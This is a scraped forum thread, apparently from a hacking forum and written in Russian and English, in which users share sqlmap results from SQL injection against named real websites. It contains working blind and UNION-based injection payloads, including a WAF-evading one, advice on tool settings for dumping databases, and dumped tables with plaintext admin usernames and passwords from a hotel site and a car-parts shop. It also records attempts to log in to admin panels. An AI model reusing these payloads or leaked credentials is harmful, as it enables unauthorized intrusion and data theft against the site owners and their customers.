is it safe for waf?В lib/core/settings.py
Change the value of MAX_NUMBER_OF_THREADS
is it safe for waf?В lib/core/settings.py
Change the value of MAX_NUMBER_OF_THREADS
nois it safe for waf?
Подскажешь где в кали этот файл хранится? Не могу найтиВ lib/core/settings.py
Поменяй значение MAX_NUMBER_OF_THREADS
https://www.kredit-zeit.de/zur-bank.php?bank=Creditolo&cat=kreditOhneSchufa
---
Parameter: bank (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bank=Creditolo' AND 2642=2642 AND 'spVs'='spVs&cat=kreditOhneSchufa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: bank=Creditolo' AND (SELECT 4327 FROM (SELECT(SLEEP(10)))xymC) AND 'ofuj'='ofuj&cat=kreditOhneSchufa
---
[20:19:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.3.6, Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
закинул бы под хайдКод:https://www.kredit-zeit.de/zur-bank.php?bank=Creditolo&cat=kreditOhneSchufa --- Parameter: bank (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bank=Creditolo' AND 2642=2642 AND 'spVs'='spVs&cat=kreditOhneSchufa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: bank=Creditolo' AND (SELECT 4327 FROM (SELECT(SLEEP(10)))xymC) AND 'ofuj'='ofuj&cat=kreditOhneSchufa --- [20:19:40] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.3.6, Nginx back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Yap, realy cute one but if you dig deeper you will see that is't not blindКод:https://www.kredit-zeit.de/zur-bank.php?bank=Creditolo&cat=kreditOhneSchufa --- Parameter: bank (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bank=Creditolo' AND 2642=2642 AND 'spVs'='spVs&cat=kreditOhneSchufa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: bank=Creditolo' AND (SELECT 4327 FROM (SELECT(SLEEP(10)))xymC) AND 'ofuj'='ofuj&cat=kreditOhneSchufa --- [20:19:40] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.3.6, Nginx back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
i dont know what you mean with that it shows for me sql injection detected i use sqlmap not showing databasesзакинул бы под хайд
use --level=3 --risk=3 and ghauri to show databasesYap, realy cute one but if you dig deeper you will see that is't not blind
h_ttps://www.kredit-zeit.de/up.php?bank=asd'%0B/*!12345UnIOn*/%0B/*!12345SEleCt*/%0Bversion(),2222-- '&cat=kreditOhneSchufa&urlp=unkwnKzeitWP
out in source: <meta http-equiv="refresh" content="0; URL=//10.3.39-MariaDB-0ubuntu0.20.04.2?&data1=kredit-zeit.deunkwnKzeitWP">
P.S.
It's cute because it's very unusual type of SQLi - it's in redirect)
h_ttps://www.kredit-zeit.de/wp-login.php
i didnt dump itКредит в домене подкупает, но по факту это же просто аффилейтный сайт? И посещаемость, если не ошибаюсь, всего 200 уников... Я не копал, так, просто поверхностно глянул.
Database: hotelese_webah
Table: usuarios
[1 entry]
+------------------+-------+--------+---------------+
| pass | login | codigo | usuario |
+------------------+-------+--------+---------------+
| admin*ahotec2010 | admin | 1 | Administrador |
+------------------+-------+--------+---------------+
https://4speed.lv/admin. Ничего интересного нет(Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://4speed.lv/lv/search/') AND 7448=7448 AND ('OqDM' LIKE 'OqDM
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://4speed.lv/lv/search/') AND (SELECT 6428 FROM (SELECT(SLEEP(5)))KVYv) AND ('Mnmp' LIKE 'Mnmp
available databases [2]:
[*] c234spped
[*] information_schema
c234speed
[05:05:16] [INFO] retrieved: CACHE_VALUES
[05:05:56] [INFO] retrieved: CARS_TABLE
[05:06:23] [INFO] retrieved: CATEGORIES
[05:06:50] [INFO] retrieved: COLOR_TABLE
[05:07:25] [INFO] retrieved: CONTACT_TABLE
[05:08:03] [INFO] retrieved: DELIVERY
[05:08:31] [INFO] retrieved: DISTINCT_CACHE
[05:09:15] [INFO] retrieved: DISTINCT_RELATIONS
[05:09:52] [INFO] retrieved: DISTINCT_TABLE
[05:10:17] [INFO] retrieved: GOODS
[05:10:36] [INFO] retrieved: GOODS_CARS_TABLE
[05:11:16] [INFO] retrieved: GOODS_COLORS_TABLE
[05:11:59] [INFO] retrieved: GOODS_RATING_TABLE
[05:12:44] [INFO] retrieved: GROUPS
[05:13:04] [INFO] retrieved: MANUFACT_TABLE
[05:13:51] [INFO] retrieved: NEWS
[05:14:05] [INFO] retrieved: PARAMS_META
[05:14:40] [INFO] retrieved: PARAMS_SHOW
[05:14:59] [INFO] retrieved: PARAMS_VALUES
[05:15:23] [INFO] retrieved: RQUIRED_GOODS_TABLE
[05:16:24] [INFO] retrieved: SUBGROUPS
[05:16:53] [INFO] retrieved: TEMP_PASSWORDS
[05:17:39] [INFO] retrieved: constructor
[05:18:13] [INFO] retrieved: email_form
[05:18:45] [INFO] retrieved: langs
[05:19:02] [INFO] retrieved: languages
[05:19:19] [INFO] retrieved: options
[05:19:42] [INFO] retrieved: pages
[05:19:57] [INFO] retrieved: plugin_data
[05:20:31] [INFO] retrieved: plugins
[05:20:39] [INFO] retrieved: product_info
[05:21:15] [INFO] retrieved: products
[05:21:23] [INFO] retrieved: slideshow
[05:21:50] [INFO] retrieved: transaction
[05:22:22] [INFO] retrieved: users
[05:22:37] [INFO] fetching columns for table 'DISTINCT_TABLE' in database 'c234spped'
[05:22:37] [INFO] retrieved: 5
[05:22:40] [INFO] retrieved: id
[05:22:49] [INFO] retrieved: DS_ID
[05:23:07] [INFO] retrieved: VAL
[05:23:17] [INFO] retrieved: MD
[05:23:24] [INFO] retrieved: GOOD_COUNT
[05:23:57] [INFO] fetching entries for table 'DISTINCT_TABLE' in database 'c234spped'
[05:23:57] [INFO] fetching number of entries for table 'DISTINCT_TABLE' in database 'c234spped'
+----+----------+------------+----------+-----------+--+
| id |lastseen|password|username|permision |
+----+----------+------------+----------+-----------+
| 1 | 0 | z0rgatew3b | admin | developer|
| 2 | 0 | speed2016 | 4speed | admin |
+----+----------+------------+----------+-----------+ -- |
https://4speed.lv/admin. Ничего интересного нет(
не заходит в админку кстати, думал посмотреть что есть(
pass - (ADFHH)YBDHU(FH&19234yyQE(&FH)*YFB)Y)!@!(*@#H@#*BUOSAFOUAYB